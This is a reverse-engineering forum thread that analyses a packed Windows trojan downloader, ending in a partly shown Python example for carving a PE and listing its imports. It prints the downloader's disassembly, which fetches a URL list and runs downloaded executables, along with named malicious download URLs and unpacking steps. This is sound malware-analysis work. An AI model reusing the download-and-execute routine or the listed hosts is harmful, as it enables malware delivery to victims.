Post #6
Nothing much here. It has two layers of packing and downloads the following from http://nimabi.be.ma/b/a/m.txt:
http://nimabi.be.ma/b/a/h.exe
http://nimabi.be.ma/b/a/ie.exe
http://nimabi.be.ma/b/a/t.exe
http://nimabi.be.ma/b/a/suo.exe
http://nimabi.be.ma/b/a/suo.exe
http://nimabi.be.ma/b/a/h.exe
A handful of trojans. The LoadRemoteFonts trick was used by 机器狗 (Robot Dog) too, wasn't it?
Here is its source code:
http://hi.bccn.net/space-265621-do-blog-id-11625.html
dump.rar
Post #7
Unpacked it and had a look; nothing much inside, it's all very straightforward. Won't say more... thanks to the author for the learning opportunity...
00401000 55 push ebp
00401001 8BEC mov ebp,esp
00401003 83C4 AC add esp,-54
00401006 8D45 BC lea eax,dword ptr ss:[ebp-44]
00401009 50 push eax
0040100A E8 17040000 call du_1.00401426 ; jmp to kernel32.GetStartupInfoA
0040100F 8D45 AC lea eax,dword ptr ss:[ebp-54]
00401012 50 push eax
00401013 8D45 BC lea eax,dword ptr ss:[ebp-44]
00401016 50 push eax
00401017 6A 00 push 0
00401019 6A 00 push 0
0040101B 6A 20 push 20
0040101D 6A 00 push 0
0040101F 6A 00 push 0
00401021 6A 00 push 0
00401023 FF75 08 push dword ptr ss:[ebp+8]
00401026 6A 00 push 0
00401028 E8 DB030000 call du_1.00401408 ; jmp to kernel32.CreateProcessA
0040102D 0BC0 or eax,eax
0040102F 75 10 jnz short du_1.00401041
00401031 FF75 B0 push dword ptr ss:[ebp-50]
00401034 E8 BD030000 call du_1.004013F6 ; jmp to kernel32.CloseHandle
00401039 FF75 AC push dword ptr ss:[ebp-54]
0040103C E8 B5030000 call du_1.004013F6 ; jmp to kernel32.CloseHandle
00401041 C9 leave
00401042 C2 0400 retn 4
00401045 55 push ebp
00401046 8BEC mov ebp,esp
00401048 81C4 E8FDFFFF add esp,-218
0040104E 33C0 xor eax,eax
00401050 8945 E8 mov dword ptr ss:[ebp-18],eax
00401053 6A 00 push 0
00401055 6A 00 push 0
00401057 6A 00 push 0
00401059 6A 00 push 0
0040105B 68 06304000 push du_1.00403006 ; ASCII "Shell"
00401060 E8 21040000 call du_1.00401486 ; jmp to wininet.InternetOpenA
00401065 0BC0 or eax,eax
00401067 0F84 F1000000 je du_1.0040115E
0040106D 8945 FC mov dword ptr ss:[ebp-4],eax
00401070 6A 04 push 4
00401072 FF75 10 push dword ptr ss:[ebp+10]
00401075 6A 02 push 2
00401077 FF75 FC push dword ptr ss:[ebp-4]
0040107A E8 19040000 call du_1.00401498 ; jmp to wininet.InternetSetOptionA
0040107F 6A 04 push 4
00401081 FF75 10 push dword ptr ss:[ebp+10]
00401084 6A 06 push 6
00401086 FF75 FC push dword ptr ss:[ebp-4]
00401089 E8 0A040000 call du_1.00401498 ; jmp to wininet.InternetSetOptionA
0040108E 6A 00 push 0
00401090 68 00000020 push 20000000
00401095 6A 00 push 0
00401097 6A 00 push 0
00401099 FF75 08 push dword ptr ss:[ebp+8]
0040109C FF75 FC push dword ptr ss:[ebp-4]
0040109F E8 E8030000 call du_1.0040148C ; jmp to wininet.InternetOpenUrlA
004010A4 0BC0 or eax,eax
004010A6 0F84 AA000000 je du_1.00401156
004010AC 8945 F8 mov dword ptr ss:[ebp-8],eax
004010AF C745 EC 00000000 mov dword ptr ss:[ebp-14],0
004010B6 C745 F0 00020000 mov dword ptr ss:[ebp-10],200
004010BD FF75 EC push dword ptr ss:[ebp-14]
004010C0 8D45 F0 lea eax,dword ptr ss:[ebp-10]
004010C3 50 push eax
004010C4 8D85 E8FDFFFF lea eax,dword ptr ss:[ebp-218]
004010CA 50 push eax
004010CB 6A 13 push 13
004010CD FF75 F8 push dword ptr ss:[ebp-8]
004010D0 E8 9F030000 call du_1.00401474 ; jmp to wininet.HttpQueryInfoA
004010D5 0BC0 or eax,eax
004010D7 74 75 je short du_1.0040114E
004010D9 6A 00 push 0
004010DB 6A 00 push 0
004010DD 6A 04 push 4
004010DF 6A 00 push 0
004010E1 6A 00 push 0
004010E3 68 00000040 push 40000000
004010E8 FF75 0C push dword ptr ss:[ebp+C]
004010EB E8 0C030000 call du_1.004013FC ; jmp to kernel32.CreateFileA
004010F0 83F8 FF cmp eax,-1
004010F3 74 59 je short du_1.0040114E
004010F5 8945 F4 mov dword ptr ss:[ebp-C],eax
004010F8 C745 EC 00000000 mov dword ptr ss:[ebp-14],0
004010FF 8D45 EC lea eax,dword ptr ss:[ebp-14]
00401102 50 push eax
00401103 68 00020000 push 200
00401108 8D85 E8FDFFFF lea eax,dword ptr ss:[ebp-218]
0040110E 50 push eax
0040110F FF75 F8 push dword ptr ss:[ebp-8]
00401112 E8 7B030000 call du_1.00401492 ; jmp to wininet.InternetReadFile
00401117 0BC0 or eax,eax
00401119 74 23 je short du_1.0040113E
0040111B 837D EC 00 cmp dword ptr ss:[ebp-14],0
0040111F 74 1D je short du_1.0040113E
00401121 FF45 E8 inc dword ptr ss:[ebp-18]
00401124 6A 00 push 0
00401126 8D45 F0 lea eax,dword ptr ss:[ebp-10]
00401129 50 push eax
0040112A FF75 EC push dword ptr ss:[ebp-14]
0040112D 8D85 E8FDFFFF lea eax,dword ptr ss:[ebp-218]
00401133 50 push eax
00401134 FF75 F4 push dword ptr ss:[ebp-C]
00401137 E8 1A030000 call du_1.00401456 ; jmp to kernel32.WriteFile
0040113C ^ EB BA jmp short du_1.004010F8
0040113E FF75 F4 push dword ptr ss:[ebp-C]
00401141 E8 FE020000 call du_1.00401444 ; jmp to kernel32.SetEndOfFile
00401146 FF75 F4 push dword ptr ss:[ebp-C]
00401149 E8 A8020000 call du_1.004013F6 ; jmp to kernel32.CloseHandle
0040114E FF75 F8 push dword ptr ss:[ebp-8]
00401151 E8 24030000 call du_1.0040147A ; jmp to wininet.InternetCloseHandle
00401156 FF75 FC push dword ptr ss:[ebp-4]
00401159 E8 1C030000 call du_1.0040147A ; jmp to wininet.InternetCloseHandle
0040115E 8B45 E8 mov eax,dword ptr ss:[ebp-18]
00401161 C9 leave
00401162 C2 0C00 retn 0C
00401165 55 push ebp
00401166 8BEC mov ebp,esp
00401168 81C4 FCFDFFFF add esp,-204
0040116E C745 FC 3C000000 mov dword ptr ss:[ebp-4],3C
00401175 FF75 08 push dword ptr ss:[ebp+8]
00401178 8D85 FCFDFFFF lea eax,dword ptr ss:[ebp-204]
0040117E 50 push eax
0040117F E8 D8020000 call du_1.0040145C ; jmp to kernel32.lstrcpyA
00401184 68 00010000 push 100
00401189 8D85 FCFEFFFF lea eax,dword ptr ss:[ebp-104]
0040118F 50 push eax
00401190 E8 A9020000 call du_1.0040143E ; jmp to ntdll.RtlZeroMemory
00401195 8D85 FCFEFFFF lea eax,dword ptr ss:[ebp-104]
0040119B 50 push eax
0040119C 6A 00 push 0
0040119E 6A 00 push 0
004011A0 68 04304000 push du_1.00403004
004011A5 E8 82020000 call du_1.0040142C ; jmp to kernel32.GetTempFileNameA
004011AA 68 88130000 push 1388
004011AF 8D85 FCFEFFFF lea eax,dword ptr ss:[ebp-104]
004011B5 50 push eax
004011B6 8D85 FCFDFFFF lea eax,dword ptr ss:[ebp-204]
004011BC 50 push eax
004011BD E8 83FEFFFF call du_1.00401045
004011C2 0BC0 or eax,eax
004011C4 74 10 je short du_1.004011D6
004011C6 8D85 FCFEFFFF lea eax,dword ptr ss:[ebp-104]
004011CC 50 push eax
004011CD E8 2EFEFFFF call du_1.00401000
004011D2 EB 15 jmp short du_1.004011E9
004011D4 EB 0D jmp short du_1.004011E3
004011D6 68 E8030000 push 3E8
004011DB E8 6A020000 call du_1.0040144A ; jmp to kernel32.Sleep
004011E0 FF4D FC dec dword ptr ss:[ebp-4]
004011E3 837D FC 00 cmp dword ptr ss:[ebp-4],0
004011E7 ^ 75 C1 jnz short du_1.004011AA
004011E9 FF0D 00304000 dec dword ptr ds:[403000]
004011EF C9 leave
004011F0 C2 0400 retn 4
///////////// entry point
004011F3 55 push ebp
004011F4 8BEC mov ebp,esp
004011F6 81C4 E8FEFFFF add esp,-118
004011FC 68 0C304000 push du_1.0040300C ; ASCII "user32.dll"
00401201 E8 2C020000 call du_1.00401432 ; jmp to kernel32.LoadLibraryA
00401206 0BC0 or eax,eax
00401208 74 11 je short du_1.0040121B
0040120A 68 17304000 push du_1.00403017 ; ASCII "LoadRemoteFonts"
0040120F 50 push eax
00401210 E8 0B020000 call du_1.00401420 ; jmp to kernel32.GetProcAddress
00401215 0BC0 or eax,eax
00401217 74 02 je short du_1.0040121B
00401219 FFD0 call eax
0040121B 8D45 FC lea eax,dword ptr ss:[ebp-4]
0040121E 50 push eax
0040121F 68 19000200 push 20019
00401224 6A 00 push 0
00401226 68 27304000 push du_1.00403027 ; ASCII "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
0040122B 68 02000080 push 80000002
00401230 E8 33020000 call du_1.00401468 ; jmp to ADVAPI32.RegOpenKeyExA
00401235 0BC0 or eax,eax
00401237 75 48 jnz short du_1.00401281
00401239 C745 F8 04010000 mov dword ptr ss:[ebp-8],104
00401240 68 04010000 push 104
00401245 8D85 E8FEFFFF lea eax,dword ptr ss:[ebp-118]
0040124B 50 push eax
0040124C E8 ED010000 call du_1.0040143E ; jmp to ntdll.RtlZeroMemory
00401251 8D45 F8 lea eax,dword ptr ss:[ebp-8]
00401254 50 push eax
00401255 8D85 E8FEFFFF lea eax,dword ptr ss:[ebp-118]
0040125B 50 push eax
0040125C 6A 00 push 0
0040125E 6A 00 push 0
00401260 68 06304000 push du_1.00403006 ; ASCII "Shell"
00401265 FF75 FC push dword ptr ss:[ebp-4]
00401268 E8 01020000 call du_1.0040146E ; jmp to ADVAPI32.RegQueryValueExA
0040126D 8D85 E8FEFFFF lea eax,dword ptr ss:[ebp-118]
00401273 50 push eax
00401274 E8 87FDFFFF call du_1.00401000
00401279 FF75 FC push dword ptr ss:[ebp-4]
0040127C E8 E1010000 call du_1.00401462 ; jmp to ADVAPI32.RegCloseKey
00401281 68 E8030000 push 3E8
00401286 E8 BF010000 call du_1.0040144A ; jmp to kernel32.Sleep
0040128B 6A 00 push 0
0040128D 8D45 F8 lea eax,dword ptr ss:[ebp-8]
00401290 50 push eax
00401291 E8 EA010000 call du_1.00401480 ; jmp to wininet.InternetGetConnectedState
00401296 0BC0 or eax,eax
00401298 75 02 jnz short du_1.0040129C
0040129A ^ EB EF jmp short du_1.0040128B
0040129C 68 04010000 push 104
004012A1 8D85 E8FEFFFF lea eax,dword ptr ss:[ebp-118]
004012A7 50 push eax
004012A8 E8 91010000 call du_1.0040143E ; jmp to ntdll.RtlZeroMemory
004012AD 8D85 E8FEFFFF lea eax,dword ptr ss:[ebp-118]
004012B3 50 push eax
004012B4 6A 00 push 0
004012B6 6A 00 push 0
004012B8 68 04304000 push du_1.00403004
004012BD E8 6A010000 call du_1.0040142C ; jmp to kernel32.GetTempFileNameA
004012C2 68 E8030000 push 3E8
004012C7 E8 7E010000 call du_1.0040144A ; jmp to kernel32.Sleep
004012CC 68 88130000 push 1388
004012D1 8D85 E8FEFFFF lea eax,dword ptr ss:[ebp-118]
004012D7 50 push eax
004012D8 68 5D304000 push du_1.0040305D ; ASCII "http://nimabi.be.ma/b/a/m.txt"
004012DD E8 63FDFFFF call du_1.00401045
004012E2 0BC0 or eax,eax
004012E4 75 02 jnz short du_1.004012E8
004012E6 ^ EB E4 jmp short du_1.004012CC
004012E8 6A 00 push 0
004012EA 6A 00 push 0
004012EC 6A 03 push 3
004012EE 6A 00 push 0
004012F0 6A 00 push 0
004012F2 68 00000080 push 80000000
004012F7 8D85 E8FEFFFF lea eax,dword ptr ss:[ebp-118]
004012FD 50 push eax
004012FE E8 F9000000 call du_1.004013FC ; jmp to kernel32.CreateFileA
00401303 83F8 FF cmp eax,-1
00401306 0F84 CC000000 je du_1.004013D8
0040130C 8945 F4 mov dword ptr ss:[ebp-C],eax
0040130F 6A 00 push 0
00401311 FF75 F4 push dword ptr ss:[ebp-C]
00401314 E8 01010000 call du_1.0040141A ; jmp to kernel32.GetFileSize
00401319 83F8 0F cmp eax,0F
0040131C 0F82 9F000000 jb du_1.004013C1
00401322 6A 00 push 0
00401324 6A 00 push 0
00401326 6A 00 push 0
00401328 6A 02 push 2
0040132A 6A 00 push 0
0040132C FF75 F4 push dword ptr ss:[ebp-C]
0040132F E8 CE000000 call du_1.00401402 ; jmp to kernel32.CreateFileMappingA
00401334 0BC0 or eax,eax
00401336 0F84 92000000 je du_1.004013CE
0040133C 8945 F0 mov dword ptr ss:[ebp-10],eax
0040133F 6A 00 push 0
00401341 6A 00 push 0
00401343 6A 00 push 0
00401345 6A 04 push 4
00401347 50 push eax
00401348 E8 EB000000 call du_1.00401438 ; jmp to kernel32.MapViewOfFile
0040134D 0BC0 or eax,eax
0040134F 74 66 je short du_1.004013B7
00401351 8945 EC mov dword ptr ss:[ebp-14],eax
00401354 8BF0 mov esi,eax
00401356 8DBD E8FEFFFF lea edi,dword ptr ss:[ebp-118]
0040135C 68 04010000 push 104
00401361 57 push edi
00401362 E8 D7000000 call du_1.0040143E ; jmp to ntdll.RtlZeroMemory
00401367 AC lods byte ptr ds:[esi]
00401368 3C 0A cmp al,0A
0040136A 75 01 jnz short du_1.0040136D
0040136C AC lods byte ptr ds:[esi]
0040136D 3C 0D cmp al,0D
0040136F 75 39 jnz short du_1.004013AA
00401371 80BD E8FEFFFF 00 cmp byte ptr ss:[ebp-118],0
00401378 74 2E je short du_1.004013A8
0040137A FF05 00304000 inc dword ptr ds:[403000]
00401380 8D45 F8 lea eax,dword ptr ss:[ebp-8]
00401383 50 push eax
00401384 6A 00 push 0
00401386 8D85 E8FEFFFF lea eax,dword ptr ss:[ebp-118]
0040138C 50 push eax
0040138D 68 65114000 push du_1.00401165
00401392 6A 00 push 0
00401394 6A 00 push 0
00401396 E8 73000000 call du_1.0040140E ; jmp to kernel32.CreateThread
0040139B 50 push eax
0040139C E8 55000000 call du_1.004013F6 ; jmp to kernel32.CloseHandle
004013A1 6A 64 push 64
004013A3 E8 A2000000 call du_1.0040144A ; jmp to kernel32.Sleep
004013A8 ^ EB AC jmp short du_1.00401356
004013AA AA stos byte ptr es:[edi]
004013AB 0AC0 or al,al
004013AD ^ 75 B8 jnz short du_1.00401367
004013AF FF75 EC push dword ptr ss:[ebp-14]
004013B2 E8 99000000 call du_1.00401450 ; jmp to kernel32.UnmapViewOfFile
004013B7 FF75 F0 push dword ptr ss:[ebp-10]
004013BA E8 37000000 call du_1.004013F6 ; jmp to kernel32.CloseHandle
004013BF EB 0D jmp short du_1.004013CE
004013C1 FF75 F4 push dword ptr ss:[ebp-C]
004013C4 E8 2D000000 call du_1.004013F6 ; jmp to kernel32.CloseHandle
004013C9 ^ E9 FEFEFFFF jmp du_1.004012CC
004013CE FF75 F4 push dword ptr ss:[ebp-C]
004013D1 E8 20000000 call du_1.004013F6 ; jmp to kernel32.CloseHandle
004013D6 EB 05 jmp short du_1.004013DD
004013D8 ^ E9 EFFEFFFF jmp du_1.004012CC
004013DD EB 07 jmp short du_1.004013E6
004013DF 6A 64 push 64
004013E1 E8 64000000 call du_1.0040144A ; jmp to kernel32.Sleep
004013E6 833D 00304000 00 cmp dword ptr ds:[403000],0
004013ED ^ 75 F0 jnz short du_1.004013DF
004013EF 6A 00 push 0
004013F1 E8 1E000000 call du_1.00401414 ; jmp to kernel32.ExitProcess
004013F6 - FF25 54204000 jmp dword ptr ds:[402054] ; kernel32.CloseHandle
004013FC - FF25 4C204000 jmp dword ptr ds:[40204C] ; kernel32.CreateFileA
00401402 - FF25 48204000 jmp dword ptr ds:[402048] ; kernel32.CreateFileMappingA
00401408 - FF25 2C204000 jmp dword ptr ds:[40202C] ; kernel32.CreateProcessA
0040140E - FF25 10204000 jmp dword ptr ds:[402010] ; kernel32.CreateThread
00401414 - FF25 14204000 jmp dword ptr ds:[402014] ; kernel32.ExitProcess
0040141A - FF25 18204000 jmp dword ptr ds:[402018] ; kernel32.GetFileSize
00401420 - FF25 1C204000 jmp dword ptr ds:[40201C] ; kernel32.GetProcAddress
00401426 - FF25 20204000 jmp dword ptr ds:[402020] ; kernel32.GetStartupInfoA
0040142C - FF25 24204000 jmp dword ptr ds:[402024] ; kernel32.GetTempFileNameA
00401432 - FF25 28204000 jmp dword ptr ds:[402028] ; kernel32.LoadLibraryA
00401438 - FF25 50204000 jmp dword ptr ds:[402050] ; kernel32.MapViewOfFile
0040143E - FF25 30204000 jmp dword ptr ds:[402030] ; ntdll.RtlZeroMemory
00401444 - FF25 34204000 jmp dword ptr ds:[402034] ; kernel32.SetEndOfFile
0040144A - FF25 38204000 jmp dword ptr ds:[402038] ; kernel32.Sleep
00401450 - FF25 3C204000 jmp dword ptr ds:[40203C] ; kernel32.UnmapViewOfFile
00401456 - FF25 40204000 jmp dword ptr ds:[402040] ; kernel32.WriteFile
0040145C - FF25 44204000 jmp dword ptr ds:[402044] ; kernel32.lstrcpyA
00401462 - FF25 04204000 jmp dword ptr ds:[402004] ; ADVAPI32.RegCloseKey
00401468 - FF25 00204000 jmp dword ptr ds:[402000] ; ADVAPI32.RegOpenKeyExA
0040146E - FF25 08204000 jmp dword ptr ds:[402008] ; ADVAPI32.RegQueryValueExA
00401474 - FF25 74204000 jmp dword ptr ds:[402074] ; wininet.HttpQueryInfoA
0040147A - FF25 5C204000 jmp dword ptr ds:[40205C] ; wininet.InternetCloseHandle
00401480 - FF25 60204000 jmp dword ptr ds:[402060] ; wininet.InternetGetConnectedState
00401486 - FF25 64204000 jmp dword ptr ds:[402064] ; wininet.InternetOpenA
0040148C - FF25 68204000 jmp dword ptr ds:[402068] ; wininet.InternetOpenUrlA
00401492 - FF25 6C204000 jmp dword ptr ds:[40206C] ; wininet.InternetReadFile
00401498 - FF25 70204000 jmp dword ptr ds:[402070] ; wininet.InternetSetOptionA
Post #8
It's really just a packer...
The du.exe the OP posted is a loader, which amounts to a packer; that's why its import table contains only GetProcAddress and LoadLibraryA.
The reason IDA shows a mess when you open du.exe directly is that the entry point is nothing but a long stretch of junk instructions.
The program simply decrypts the other, real PE file embedded in its own image, allocates memory, maps the image in, and jumps into that real PE file to execute it.
Once du.exe is loaded into memory, the real PE file's content starts at 0x00511B1D (00510000 is du.exe's default image base) and is 0x1200 bytes in size.
Specifically:
Load du.exe in OD, bp VirtualAlloc, press F9 to break, then Ctrl+F9 to return; you arrive at the following location, then single-step a few more times:
00511302 59 pop ecx
00511303 85C0 test eax, eax
00511305 75 14 jnz short 0051131B
00511307 6A 40 push 40
00511309 68 00100000 push 1000
0051130E 51 push ecx
0051130F 50 push eax
00511310 FFD3 call ebx
00511312 90 nop
00511313 85C0 test eax, eax
00511315 0F84 18030000 je 00511633
0051131B 8945 F4 mov dword ptr [ebp-C], eax
0051131E 90 nop
0051131F 89C7 mov edi, eax ; 00400000
00511321 90 nop
00511322 8B75 08 mov esi, dword ptr [ebp+8] ; 00511B1D, start of the file
You'll see that 00511B1D is where the real PE file starts in du.exe's memory.
After that you can watch the typical process of mapping the file image into memory starting at 0x00400000 and filling in the IAT.
So at this point you only need to dump the memory starting at 00511B1D, and that is the real PE file's content.
Save it as du1.exe, then inspect its PE structure with LordPE; you'll find the file size is only 0x1200 bytes, so trim off the unnecessary part after that.
Load du1.exe in OD; the entry point is obviously a simple compression packer, which ends at the following location:
0040429F FFE2 jmp edx
F4 then F8 takes you straight to the OEP, 004011F3; use LordPE and ImportREC to dump and repair the IAT.
The resulting du2.exe, opened in OD and IDA, is perfectly clear; nothing new at all.
The file with the list of URLs for downloading the viruses is http://nimabi.be.ma/b/a/m.txt
So this thing is nothing "high quality" at all; the final code is simple and understandable at a glance.
Attachments include:
du1.exe: the real PE file found in du.exe's memory.
du2.exe: du1.exe after unpacking; easy to analyze directly in OD or IDA.
Post #10
zhzhtst unpacked it very cleanly... I think the packer is the reason it won't run in the VM. I traced to
00511516 > 90 NOP
and at the LoadLibraryA("USER32.DLL") that follows it, execution flew off somewhere.
So the PE file is at 00511B1D. That LoadLibraryA("USER32.DLL") clearly modified the return parameters on the stack; right after the RET comes LoadLibraryA(gdi32.dll)...
0012E79C 73FBE21F 返回到 USP10.73FBE21F 来自 kernel32.LoadLibraryA
0012E7A0 73FA1850 ASCII "gdi32.dll"
0012E7A4 73FA0000 USP10.73FA0000
0012E7A8 00000000
Heh, thanks to 小聪 for the answer, right when I was figuring out how to unpack it.
Could this packer be using a different way of running from memory? Going to take another look...
Post #13
I still don't understand how this packer gets the in-memory EXE running.
It copies the PE file to 00400000, then relocates it itself, then sets PEB.ImageBaseAddress = 00400000, then searches PEB.Ldr (this is the part that confuses me)...
00511322 . 8B75 08 MOV ESI,DWORD PTR SS:[EBP+8] ; ESI = pMemory_Start
00511326 . 56 PUSH ESI
00511327 . 89F1 MOV ECX,ESI
00511329 . 034E 3C ADD ECX,DWORD PTR DS:[ESI+3C] ; ECX -> 'PE'
... ...
00511331 . F3:A4 REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[>; write to the memory just allocated at 00400000
... ...
00511348 . 0FB640 06 MOVZX EAX,BYTE PTR DS:[EAX+6] ; [PE+6] = (4) read the number of sections
... ...
0051134D > 8D7D C8 LEA EDI,DWORD PTR SS:[EBP-38] ; the loop below lays out the PE at 0040000
00511351 . 57 PUSH EDI
00511352 . 6A 0A PUSH 0A
00511354 . 59 POP ECX
00511355 . F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS>
00511357 . 5F POP EDI
00511359 . 8B57 14 MOV EDX,DWORD PTR DS:[EDI+14] ; Size(400)
0051135D . 85D2 TEST EDX,EDX
0051135F . 74 1B JE SHORT mydu1.0051137C
00511362 . 56 PUSH ESI
00511363 . 8B75 08 MOV ESI,DWORD PTR SS:[EBP+8] ; pMemory_Start
00511367 . 01D6 ADD ESI,EDX ; add the previous section's size
0051136A . 8B4F 10 MOV ECX,DWORD PTR DS:[EDI+10]
0051136E . 8B57 0C MOV EDX,DWORD PTR DS:[EDI+C] ; aligned size
00511372 . 8B7D F4 MOV EDI,DWORD PTR SS:[EBP-C] ; Base
00511376 . 01D7 ADD EDI,EDX ; Base + aligned size
00511379 . F3:A4 REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[>; write the data at the aligned start position
0051137B . 5E POP ESI
0051137C > 48 DEC EAX ; section count - 1
0051137E .^ 75 CD JNZ SHORT mydu1.0051134D
; ???
00511431 > 90 NOP ; looks like the loop that searches for Ldr
00511432 . 8B50 18 MOV EDX,DWORD PTR DS:[EAX+18] ; EDX=pMemory_Start
... ...
0051146B . 3930 CMP DWORD PTR DS:[EAX],ESI ; [EAX] == PEB.Ldr
0051146D . 74 06 JE SHORT mydu1.00511475
0051146F . 8B00 MOV EAX,DWORD PTR DS:[EAX]
00511472 .^ EB BD JMP SHORT mydu1.00511431
00511475 > 90 NOP ; at this point [EAX]=Ldr
00511476 . 8B9D 88FEFFFF MOV EBX,DWORD PTR SS:[EBP-178] ; EBX=4000
0051147D . 85DB TEST EBX,EBX
0051147F . 0F84 9E000000 JE mydu1.00511523
00511485 . 8B75 F4 MOV ESI,DWORD PTR SS:[EBP-C] ; ESI = Base
00511488 . 01F3 ADD EBX,ESI ; 00404000 - relocation table
0051148B > 90 NOP ; manual relocation??
0051148C . 8B43 0C MOV EAX,DWORD PTR DS:[EBX+C]
0051148F . 85C0 TEST EAX,EAX
00511491 . 0F84 8C000000 JE mydu1.00511523
00511498 . 8B4B 10 MOV ECX,DWORD PTR DS:[EBX+10]
0051149C . 01F1 ADD ECX,ESI ; at 00404044
0051149F . 894D C4 MOV DWORD PTR SS:[EBP-3C],ECX
005114A3 . 8B0B MOV ECX,DWORD PTR DS:[EBX]
005114A6 . 85C9 TEST ECX,ECX
005114A8 . 75 04 JNZ SHORT mydu1.005114AE
005114AA . 8B4B 10 MOV ECX,DWORD PTR DS:[EBX+10]
005114AE > 01F1 ADD ECX,ESI
005114B1 . 894D C0 MOV DWORD PTR SS:[EBP-40],ECX
005114B5 . 01F0 ADD EAX,ESI ; EAX = DLL name
005114B8 . 50 PUSH EAX
005114BA . 8B45 10 MOV EAX,DWORD PTR SS:[EBP+10]
005114BE . FF10 CALL DWORD PTR DS:[EAX] ; LoadLibraryA(Kernel32)
005114C1 . 85C0 TEST EAX,EAX
005114C3 . 0F84 6A010000 JE mydu1.00511633
005114CC . 89C7 MOV EDI,EAX ; EDI = Kernel32 Base
005114D0 . 8B4D C0 MOV ECX,DWORD PTR SS:[EBP-40]
005114D4 . 8B11 MOV EDX,DWORD PTR DS:[ECX]
005114D7 . 85D2 TEST EDX,EDX
005114D9 . 74 3B JE SHORT mydu1.00511516
005114DC . F7C2 00000080 TEST EDX,80000000
005114E2 . 74 0B JE SHORT mydu1.005114EF
005114E5 . 81E2 FFFFFF7F AND EDX,7FFFFFFF
005114EC . EB 0A JMP SHORT mydu1.005114F8
005114F0 . 01F2 ADD EDX,ESI
005114F4 . 42 INC EDX
005114F6 . 42 INC EDX ; EDX = API Name
005114F8 > 52 PUSH EDX
005114FA . 57 PUSH EDI
005114FC . 8B45 0C MOV EAX,DWORD PTR SS:[EBP+C]
00511500 . FF10 CALL DWORD PTR DS:[EAX] ; Out Here!
00511503 . 8B4D C4 MOV ECX,DWORD PTR SS:[EBP-3C]
00511507 . 8901 MOV DWORD PTR DS:[ECX],EAX
00511509 . 8345 C4 04 ADD DWORD PTR SS:[EBP-3C],4
0051150E . 8345 C0 04 ADD DWORD PTR SS:[EBP-40],4
00511513 .^ EB BA JMP SHORT mydu1.005114CF
00511516 > 90 NOP ; F4 Here!
00511517 . 83C3 14 ADD EBX,14
0051151B .^ E9 6BFFFFFF JMP mydu1.0051148B
Testing it is simple: with the du1.exe from the attachment, press F4 at the line marked "F4 Here!" (00511516), then follow to the line marked "Out Here!" (00511500), the LoadLibraryA("USER32.DLL") call, and F7 into it to see:
LoadLibraryA:
7C801D77 > 8BFF MOV EDI,EDI ; kernel32.7C800000
...
7C801D98 6A 00 PUSH 0
7C801D9A 6A 00 PUSH 0
7C801D9C FF75 08 PUSH DWORD PTR SS:[EBP+8]
7C801D9F E8 ABFFFFFF CALL kernel32.LoadLibraryExA
Stack before the call:
0012FD88 00404061 |FileName = "USER32.DLL"
0012FD8C 00000000 |hFile = NULL
0012FD90 00000000 \Flags = 0
0012FD94 00400000
0012FD98 00404014 ASCII "<@"
0012FD9C /0012FFB0
0012FDA0 |005114C0 返回到 mydu1.005114C0
0012FDA4 |00404061 ASCII "USER32.DLL"
Then it goes differently:
7C801DA4 5E POP ESI
7C801DA5 5B POP EBX
7C801DA6 5D POP EBP
7C801DA7 C2 0400 RETN 4
Stack when execution reaches the RET:
0012E79C 73FBE21F 返回到 USP10.73FBE21F 来自 kernel32.LoadLibraryA
0012E7A0 73FA1850 ASCII "gdi32.dll"
0012E7A4 73FA0000 USP10.73FA0000
0012E7A8 00000000
kernel32.LoadLibraryA has ended up at USP10.73FBE21F... could it be my VM acting up?
Could someone who knows explain how this packer gets the program running?
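The analysis in posts #8 and #13 comes down to two PE-format tasks: carving the embedded executable out of a dump and trimming it to its real on-disk size (which #8 did by reading LordPE), and walking the IMAGE_IMPORT_DESCRIPTOR entries the way the loader does (Name at +0xC, OriginalFirstThunk at +0 with FirstThunk at +0x10 as the fallback, the 0x80000000 ordinal flag, and the two-byte hint in front of each function name). The Python below is an added example, not code from the thread or its attachments: it does both on a constructed minimal PE32 that imports kernel32!CreateFileA, a kernel32 ordinal and user32!LoadRemoteFonts. The sample "dump", the helper names and the 0x1000/0x200 section layout are assumptions; the parser handles PE32 only, like the sample in the thread.

```python
"""Carve an embedded PE32 from a memory dump and list its import table. Added example,
not code from the thread: the builder, the dump and the helper names are constructed here."""
import struct

def u16(b, o): return struct.unpack_from("<H", b, o)[0]
def u32(b, o): return struct.unpack_from("<I", b, o)[0]
def cstr(b, o): return b[o:b.index(b"\0", o)].decode("ascii")

def sections(pe):
    """(VirtualAddress, SizeOfRawData, PointerToRawData) for each section header."""
    nt = u32(pe, 0x3C)                                 # e_lfanew
    first = nt + 24 + u16(pe, nt + 20)                 # past signature, FILE_HEADER, optional header
    return [(u32(pe, h + 12), u32(pe, h + 16), u32(pe, h + 20))
            for h in range(first, first + 40 * u16(pe, nt + 6), 40)]

def rva_to_off(secs, rva):
    """File offset of an RVA, via the section whose raw data backs it."""
    for va, raw_size, raw_ptr in secs:
        if va <= rva < va + raw_size:
            return rva - va + raw_ptr
    raise ValueError(f"RVA {rva:#x} is not backed by file data")

def carve_pe(blob):
    """(offset, bytes) of the first PE whose headers parse; length from the section table, not the dump end."""
    pos = blob.find(b"MZ")
    while pos != -1:
        try:
            e_lfanew = u32(blob, pos + 0x3C)
            if e_lfanew >= 0x40 and blob[pos + e_lfanew:pos + e_lfanew + 4] == b"PE\0\0":
                pe = blob[pos:]
                size_of_headers = u32(pe, e_lfanew + 24 + 60)
                end = max([size_of_headers] + [p + s for _, s, p in sections(pe)])
                return pos, pe[:end]
        except struct.error:
            pass                                       # header runs past the dump: not a PE
        pos = blob.find(b"MZ", pos + 1)
    return None

def parse_imports(pe):
    """{dll: [name or '#ordinal', ...]}, walking descriptors like the loader in the thread:
    Name at +0xC, OriginalFirstThunk at +0 (FirstThunk +0x10 as fallback), hint before names."""
    nt = u32(pe, 0x3C)
    opt = nt + 24
    if u16(pe, opt) != 0x10B:
        raise ValueError("PE32 only, like the sample in the thread")
    secs = sections(pe)
    imp_rva = u32(pe, opt + 0x68)                      # DataDirectory[1] = import table
    if imp_rva == 0:
        return {}
    imports, desc = {}, rva_to_off(secs, imp_rva)
    while u32(pe, desc + 0xC) != 0:                    # all-zero descriptor ends the table
        dll = cstr(pe, rva_to_off(secs, u32(pe, desc + 0xC)))
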